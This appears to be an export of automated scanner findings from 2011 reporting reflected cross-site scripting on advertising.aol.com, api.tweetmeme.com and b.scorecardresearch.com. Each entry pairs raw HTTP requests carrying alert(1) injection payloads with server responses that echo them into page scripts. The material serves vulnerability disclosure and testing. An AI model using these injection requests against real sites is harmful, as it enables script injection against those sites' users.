HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:10:44 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:10:44 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28113 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... 65=s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/fb106"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/0/3/1885310732/ |
GET /b8b5b"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:49:29 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:49:29 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28113 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... 65=s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/b8b5b"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/1/1/1462706141/ |
GET /15615"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:12:41 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:12:41 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28113 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... 65=s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/15615"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/1/3/1308197307/ |
GET /3c8fc"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:49:19 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:49:19 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28113 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... 65=s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/3c8fc"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/2/2/2011729621/ |
GET /396da"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:13:20 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:13:20 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28113 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... 65=s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/396da"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/2/3/868831419/ |
GET /3332d"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:51:09 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:51:09 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28111 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... 65=s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/3332d"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/3/2/1144859041/ |
GET /4caa4"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:11:10 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:11:10 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28113 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... 65=s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/4caa4"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/3/3/963398391/ |
GET /58984"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:51:52 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:51:52 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28111 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... 65=s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/58984"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/4/1/1214941173/ |
GET /6dc75"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:12:52 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:12:52 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28113 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... 65=s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/6dc75"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/4/3/1727096706/ |
GET /7cff9"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:49:51 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:49:51 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28113 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... 65=s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/7cff9"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/5/2/2011695027/ |
GET /e79f0"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:11:06 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:11:06 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28113 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... 65=s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/e79f0"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/5/3/803328935/ |
GET /6958e"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:49:08 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:49:08 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28109 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... 65=s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/6958e"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/6/1/737485457/ |
GET /615c2"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:11:03 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:11:04 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28111 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... 65=s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/615c2"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/6/3/807811660/ |
GET /a2eae"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:50:48 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:50:49 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28111 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... 65=s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/a2eae"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/7/1/585611182/ |
GET /89719"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:11:27 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:11:27 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28111 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... 65=s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/89719"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/7/3/1807570122/ |
GET /26169"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:50:53 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:50:53 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28113 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... 65=s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/26169"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/8/1/592246145/ |
GET /6c9dd"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:11:57 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:11:57 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28111 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... 65=s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/6c9dd"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/8/3/1337747048/ |
GET /210f6"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 11:51:03 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 04 Sep 2011 11:51:03 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 28113 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... 65=s_gi('aolamn,aolsvc'); s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/210f6"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://api.tweetmeme.com |
Path: | /v2/follow.js |
GET /v2d62cf<a>46058332c53/follow.js?screen_name Host: api.tweetmeme.com Proxy-Connection: keep-alive Referer: http://social.ndtv.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Sun, 04 Sep 2011 03:39:19 GMT Content-Type: text/html Connection: close P3P: CP="CAO PSA" X-Served-By: h03 Content-Length: 101 tweetmemedata({"status": |
Severity: | High |
Confidence: | Certain |
Host: | http://api.tweetmeme.com |
Path: | /v2/follow.js |
GET /v2/follow.js?screen_name Host: api.tweetmeme.com Proxy-Connection: keep-alive Referer: http://social.ndtv.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Sun, 04 Sep 2011 03:38:39 GMT Content-Type: text/html Connection: close P3P: CP="CAO PSA" X-Served-By: h02 Content-Length: 2714 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>TweetMeme F ...[SNIP]... <a class="profile_image" href="http://twitter.com ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://api.tweetmeme.com |
Path: | /v2/follow.js |
GET /v2/follow.js?screen_name Host: api.tweetmeme.com Proxy-Connection: keep-alive Referer: http://social.ndtv.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Sun, 04 Sep 2011 03:38:49 GMT Content-Type: text/html Connection: close P3P: CP="CAO PSA" X-Served-By: h04 Content-Length: 69 normalb846e<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=8197ba<script>alert(1)< Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://web.adblade.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=9951d9b8-80.67.74.150 |
